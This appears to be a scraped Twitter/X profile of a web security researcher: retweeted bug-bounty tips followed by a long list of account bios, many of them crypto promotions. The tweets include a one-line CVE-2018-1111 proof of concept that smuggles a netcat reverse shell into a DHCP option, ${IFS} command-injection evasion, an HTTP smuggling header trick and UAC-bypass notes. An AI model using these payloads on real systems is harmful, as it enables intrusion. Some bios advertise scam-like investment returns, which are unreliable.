xk0n @xk0n_ | web security researcher | Joined November 2014
Tweets: 53 | Followers: 23 | Following: 757 | Likes: 220
Use the OKX Web3 wallet and be the first to claim a free Moca ID! okx.com/cn/web3/gamefi… #OKX #GameFi #Mocaverse #OKXGameFi
If you perform SAML auth in Java you should make sure you have patched bugs.chromium.org/p/project-zero…. RCE during signature verification. Blog post coming soon™.
New: curl -s "crt.sh/?q=%25.tesla.c…" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew @b51b5b43 @Jhaddix @stokfredrik @TomNomNom
I found another way to do HTTP smuggling: you can use T-E: chunKed, where K is the Kelvin symbol (%E2%84%AA). If the header is converted to lowercase, you get 'chunked' in ASCII; if it's converted to uppercase it will stay the same (invalid). cc @albinowax
It turns out nearly 300 executables in your System32 folder are vulnerable to relative path DLL Hijacking. Did you know that with a simple VBScript some of these EXEs can be used to elevate such executions, bypassing UAC entirely? Full blog post here 👉 wietze.github.io/blog/hijacking…
Reproduced CVE-2020-10199 Nexus Repo Manager RCE with @rootxharsh. securitylab.github.com/advisories/GHS… states that this is an auth'd RCE. However, on the version we tested, i.e. 3.21.0-05, the payload is executed before the authentication check, AKA pre-auth RCE. //cc: @pwntester
We (w/ @__hach_) found a vulnerability in Kubernetes: CVE-2020-8555; +40K$ crazy bounties; really cool stuff about exploitation on BIG Bug Bounty programs. Read more here: medium.com/@BreizhZeroDay…
You asked for something about OAuth — we did. Here is a mindmap about hacking OAuth 2.0. We tried to cover all possible ways even with low impact. Our inspiration was homakov.blogspot.com/search?q=oauth Thanks to @homakov for outstanding articles. #BugBountyTip #CyberSecurity #BugBounty
.@NahamSec you asked me yesterday about how to learn deserialization attacks - So...
Mobile Application Pentesting: Part 1: medium.com/@patilpiyush/m… Part 2: medium.com/@patilpiyush/m… Part 3: medium.com/@patilpiyush/m… Part 4: medium.com/@patilpiyush/m… Part 5: medium.com/@patilpiyush/m… Part 6: medium.com/@patilpiyush/m…
Execute bash commands without spaces with two methods: 1) {ping,-c,1,127.0.0.1} 2) ping${IFS}-c${IFS}1${IFS}127.0.0.1 (the terminal will translate ${IFS} into a space). Thanks @ippsec
Red Team: Do you know what data your offensive operations are leaking via TLS negotiations? Neither did I until a friend showed me. Blue Team: Good blocking & detection potential. Worth your interest! Start here: github.com/salesforce/ja3 Thanks @haroldogden!
List of bug bounty writeups pentester.land/list-of-bug-bo…
#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat
dnsdb.io has tons of domain data for your pentesting needs :)
Bad-PDF creates a malicious PDF to steal NTLM hashes from Windows machines; it utilizes a vulnerability disclosed by the Checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using a Responder listener. This method works on all PDF readers(… ift.tt/2I58Ydk
Happy to announce the release of our first awesome-list: Awesome Firmware Security. github.com/PreOS-Security…

LetitiaSenior @66YQdu2XC4yqi
14 Followers 863 Following
Jocelyn @Uglooardax7727
33 Followers 2K Following The question isn’t who’s going to let me; it’s who’s going to stop me.
James Carlisle @SharonKlei38199
1 Followers 72 Following Weekly selection of high-quality stocks. 30% monthly return rate. Free 2-month trial. Click the link to join us: https://t.co/2NMVKF5QM1
Echo @Noti_CoFounder
221 Followers 4K Following The Thinker | The Sniper | The Visionary | CEO & CPO @noti_official | Crafting the future of token sniping.
🚖X·H·C线下应... @xhcminibus
234 Followers 4K Following 🛵 Little yellow cart, "ride" out your style! 🥇 Luxury edition: double the prestige, so good you'll fly | 🥈 Light edition: affordable and the fun doesn't fade | Telegram channel, waiting for you to join ⤵️ https://t.co/upu1fNLOOG
Robert Beltran @rbeltran
991 Followers 770 Following #ProdSec/#AppSec Engineering Manager keeping you safe from insecure code
扛杆币知识汇总... @huyi88084998
22 Followers 526 Following [Top-tier crypto crowdfunding community] Updates on all the major paid groups, gathering the paid-community content of many big names, helping you learn the most complete top-tier paid crypto community content at the lowest cost. Freeloaders need not apply! If interested, add me on WeChat; see the pinned tweet for details #区块链 #以太坊 #币安
比特币炒币不赚... @BtBNFTjuniu69
390 Followers 4K Following #DEFI #AVAX #NFT Add me on WeChat to immediately get, for free, 2 days of over 30 items of top-tier paid content from the global crypto scene. [Juniu Coin group-buy community] brings together paid-community content worth about 200,000 RMB, including nansen data analysis, #头等舱研报, #本末区块, #蓝狐笔记, 区块链三刀, 零X干货铺, 掘金之路, #德妃耕田 and more. We have all the highest-quality communities in the global crypto scene #区块链 #FTM
Juzo @b0x_in
1K Followers 6K Following
gabriel lawrence @gebl
2K Followers 3K Following mastodon: https://t.co/Cn4uf9OJdY #BlackLivesMatter #StopSystemicOppression he/him
What_i_think @See_what_i_thnk
15 Followers 127 Following Passion for Infosec, bass fishing and motorcycles
cr0@Defensive-Securit... @cr0nym
3K Followers 2K Following Focus on Linux/Kubernetes Attack/Detection/Forensics/Incident Response/Threat Hunting/Active Defense. Learning hard every single day.
LurkingMedia @lurking_media
477 Followers 2K Following #Hacktivist,#Activist, #DeplorableBitches, #media, #lurkingmedia,#lurking, #BugBounty,#HackThePlanet, #HackersGonnaHack, #HackersOne:)
24X7Fe @24x7Fe
911 Followers 3K Following News, technology, and fun for the connected generation. Tweets by @24x7Fe staff.
mustacheBiz @mustacheBiz
397 Followers 3K Following We produce articles, essays and podcasts for the inveterate entrepreneur. Topics: #leanstartup #growthmarketing #customerdevelopment and #leanproductmanagement.
Hunter ExploitKit @hunter_exploit
1K Followers 1K Following Official page account sales and Technical Support XMPP : [email protected]
Terra Lucas @TerraLucas10
164 Followers 818 Following
図解女体の神秘 @LeonieGripper
185 Followers 678 Following
女性恐怖症@ゆ... @lostforest19
130 Followers 658 Following It doesn't matter at all if you have trouble socializing! A method to get a girlfriend who loves you back even with zero conversation skills! Please take a look at the blog if you like! http://t.co/WdeFuYVuQr
炉 @strangewomandcl
357K Followers 220 Following Love scorches my exhausted chest // Only backup account @YouKnowDu // 🚪298 WeChat+Telegram, send the passcode red packet and WeChat ID directly // No promotions // Stop reporting stolen photos and videos to me, this is my only account on any platform
MoonPay 🟣 @moonpay
241K Followers 19K Following Proudly helping millions of people onramp and offramp to crypto since 2019
Hyperliquid @HyperliquidX
327K Followers 7 Following The blockchain to house all finance. Trade, build apps, and launch tokens on the same hyper-performant chain. X by Hyper Foundation
Kittenswap (🐱,🐱... @KittenswapHype
8K Followers 284 Following Kittenswap is a community owned DEX on HyperEVM with ve(3,3) mechanics! Join us https://t.co/4pDGUR4GY4
HyperSwap @HyperSwapX
25K Followers 9 Following First @HyperliquidX EVM native AMM DEX and Liquidity Hub 👀
Unit @hyperunit
32K Followers 3 Following
야살 / Yasal @Yasal_170
807K Followers 582 Following 🇰🇷 Cosplayer || ZEN Creative | RZ Cos | RZ Heroes Business : [email protected]
币圈慈善家 @cryptocishanjia
298K Followers 2K Following Trader, Investor, rational, not investment advice. A-nai, you can definitely do it! The No. 1 Chinese-language meme trading platform https://t.co/CUU2jfYanc First choice for newcomers, OKX, safe and simple https://t.co/9Whl44E5hC The shared choice of nearly 300 million users, at Binance | https://t.co/vs6TcdYute
Veronica @VeronicaPump
11K Followers 2K Following Degen / Restarted on an alt account / NFA / Scanning the chain 16 hours a day, All in Meme / Unity of knowledge and action / If you DM me to chat, assume I may screenshot and post it / Don't copy my trades, no investment advice, I don't post sell points / $SOL Maxi
九条命 @CryptoKobe92
29K Followers 539 Following Be a little braver, you must be a little braver | Use the meme-sniping ("dog-hitting") tool below to have nine lives like me: https://t.co/zVTHN5twG1 | OK Wallet referral code: YIQIFACAI999 (all rebates automatically returned to you) https://t.co/W5Lut3ntCl
Ansem @blknoiz06
768K Followers 9K Following coldest nigga breathing | trading @BullpenFi | poker @PlaySOPO | gambling @luckio | creator/DMs @timedotfun | all other clone accounts are scams
HORSE 🏴☠️ @TheFlowHorse
274K Followers 4K Following Former prop turned pajama trader. Girl dad and husband of one of those wild horse girls • Burn the ships.🇺🇸⚔️Sweeping the book in the @tradingstable
//Bitcoin 𝕵ack ... @BTC_JackSparrow
269K Followers 1K Following |+| I'll eat when I'm hungry #Bitcoin |+| Magic @thestorecloud //
Alex Krüger @krugermacro
215K Followers 2K Following 🇦🇷 Economist. Trader. Advisory. Sharing views on crypto and global markets.
Bob Loukas 🗽 @BobLoukas
356K Followers 443 Following Position Trader, Entrepreneur, Family Man, Fullfilled. Omnia mea mecum porto.
adam @abetrade
192K Followers 287 Following often wrong, never false. education at https://t.co/zK8xP4YHM5 part of @breakoutprop
Byzantine General @ByzGeneral
239K Followers 597 Following Cartoon tiger pressing buttons. Advisor @Velo_xyz TG: https://t.co/Vr8VYHAkvm
loomdart - Holy War A... @loomdart
324K Followers 17K Following combatting modern addictions @loomlocknft don't check x dm's use telegram https://t.co/lctDOfrMmf not angel, not KOL, not investing, go away
IamNomad @IamNomad
227K Followers 2K Following
Tuur Demeester @TuurDemeester
308K Followers 3K Following Host of @BReelPod. Board @TXBitcoinFound, advisor to @Blockstream, @Unchained, @AnchorWatch.
Murad 💹🧲 @MustStopMurad
740K Followers 8K Following Crypto Analysis. Stop Trading & Believe in #SPX6900 TikTok @MustStopMurad YouTube @MustStopMurad Telegram @MustStopMurad Instagram @ MuradCrypto Past @Princeton
magnolia @0xmagnolia
61K Followers 5K Following ᴍᴀᴋᴇ ᴀʟᴛᴄᴏɪɴs ɢʀᴇᴀᴛ ᴀɢᴀɪɴ!!! ɪꜰ ʏᴏᴜ'ʀᴇ ʟᴏᴏᴋɪɴɢ ꜰᴏʀ ᴀʟᴘʜᴀ ᴏɴ ʙʟᴜᴇ ᴄʜɪᴘ https://t.co/epT68ZQrQq
Phyrex @Phyrex_Ni
348K Followers 5K Following 4XLABS helps global Web3 projects land in the Chinese-speaking market. Just a grunt worker, occasionally taking a sponsored post. No extravagant hopes, no waste. Heavy GlassNode user. No group and no fees; none of my analysis or answers constitutes investment advice. Binance, the shared choice of nearly 300 million users: https://t.co/JukzSnpfwD OKX is all you need as your crypto entry point: https://t.co/vPOAfIjmpB Bitget, the one with a human touch: https://t.co/VZ8RxZe5N7
BlockSec @BlockSecTeam
27K Followers 146 Following Smart Contract Audit | Security Monitoring | AML/CFT (KYA/KYT) | Crypto Investigation | @Phalcon_xyz @MetaSleuth @MetaDockTeam 👉TG: https://t.co/owokTLanv5
23pds (山哥) @im23pds
14K Followers 6K Following Dad/@SlowMist_Team Partner&CISO/#Web3 Security Researcher/RedTeam/Pentester/AI security hunter #bitcoin
felixhsu @Felix_Hsu
14K Followers 154 Following Trader, entrepreneur, geek, fake coder and real Scuderia Ferrari fan.
PeckShieldAlert @PeckShieldAlert
92K Followers 1 Following Free Chrome Extension: https://t.co/yvXOjS8ZRI Telegram: https://t.co/qX5sVtdkFD
Shib @Shibtoken
3.9M Followers 44 Following Official Twitter of the Shiba Inu Ecosystem $SHIB, $BONE, #SHIBOSHIS, #SHEBOSHIS and $TREAT!
The Data Nerd @OnchainDataNerd
72K Followers 528 Following On a mission to make onchain data digestible
B² Network | Scaling... @BSquaredNetwork
432K Followers 325 Following Put Bitcoin in Every AI Agent’s Wallet | Scaling BTC from Store of Value to Practical Utility | $B2 for governance & rewards https://t.co/IveK1dVurK
Delphi Digital @Delphi_Digital
212K Followers 1K Following A research-driven firm dedicated to making crypto happen sooner and better than it would without us.
Banana Gun 🍌🔫 @BananaGunBot
101K Followers 48 Following The best trading bot, built by on-chain traders. ETH | SOL | BASE | BNB | SONIC | UNI Only @BananaGunBot is real, watch out! https://t.co/TNB8wS4dX5
pepe boost @PepeBoost888
90K Followers 1K Following Telegram trading bot designed by data scientists 🧑🔬 Co-Founder of @useXXYYio #Solana bot🤖 https://t.co/yoAtQeJ9xV
Arthur Hayes @CryptoHayes
741K Followers 25 Following Arthur Hayes, Co-Founder of BitMEX & CIO @Maelstromfund
Lilyanna 比特里里... @lilyanna_btc
28K Followers 1K Following Focused on the Bitcoin ecosystem: research and popular explanations of Ordinals/Runes/Atomicals, the Merlin Chain ecosystem and various innovative protocols
Starknet @Starknet
346K Followers 697 Following Shaping the future with scale and integrity. X run by community member @Starkwareltd
Magic Eden 🪄 @MagicEden
828K Followers 3K Following The best place to trade all assets onchain | https://t.co/TM8CKG6p4R | Posts not intended for US or UK audiences
Yi He @heyibinance
434K Followers 1K Following Co-Founder & Chief Customer Service Officer @Binance Holder of #BNB
Perimeter @perimeter_sec
423 Followers 8 Following Industry leading security services specialized in fuzzing, securing DeFi's largest protocols
lourens @LourensLinde
630 Followers 1K Following Finding bugs in smart contracts @OpenZeppelin. Prev Fuzzing Dev @getreconxyz. Only my own opinions here.
codingsh 👨🏾... @codingsh
1K Followers 6K Following Serial Founder, Blockchain architect , King of Dance, Opensource Maxi
m4rio @m4rio_eth
3K Followers 666 Following Lead Security Researcher and meme lord @cantinaxyz! | EVM, Solana, Rust | Building https://t.co/RpwO9jNyX7 first solidity package manager
Zellic @zellic_io
16K Followers 15 Following Security reviews and research that keep winners winning. We apply unmatched hacking talent to secure critical software for the most innovative teams.
Adrian ⛩️ Hetman ... @adrianhetman
7K Followers 3K Following Head of Triaging @immunefi 🛡️⚔️ Crypto, & analog life | Journals, watches, and personal growth | Sharing what works (and what doesn’t)—join the journey.